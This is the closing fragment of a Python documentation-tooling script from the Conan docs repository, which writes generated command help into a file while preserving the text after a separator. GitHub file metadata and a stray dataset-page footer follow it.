        if len(rest_content) > 1:
            # Replace only the generated section; everything after the
            # triple-newline separator is preserved verbatim.
            the_file.write(prev_content + text + separator + rest_content[1])
        else:
            raise Exception("Separator (two consecutive newlines) not found")
    else:
        the_file.write(text)
    the_file.close()
|
{
"content_hash": "f618f9f7c0fee273302b13495d393ef7",
"timestamp": "",
"source": "github",
"line_count": 134,
"max_line_length": 99,
"avg_line_length": 26.395522388059703,
"alnum_prop": 0.5620582414475545,
"repo_name": "conan-io/docs",
"id": "4cf63c196319f76019bf36fb01ab21126f570e07",
"size": "3537",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "commands_help_update.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "7513"
},
{
"name": "CSS",
"bytes": "3659"
},
{
"name": "Dockerfile",
"bytes": "104"
},
{
"name": "HTML",
"bytes": "25046"
},
{
"name": "JavaScript",
"bytes": "8482"
},
{
"name": "Makefile",
"bytes": "7885"
},
{
"name": "Python",
"bytes": "21553"
},
{
"name": "Shell",
"bytes": "40"
}
],
"symlink_target": ""
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.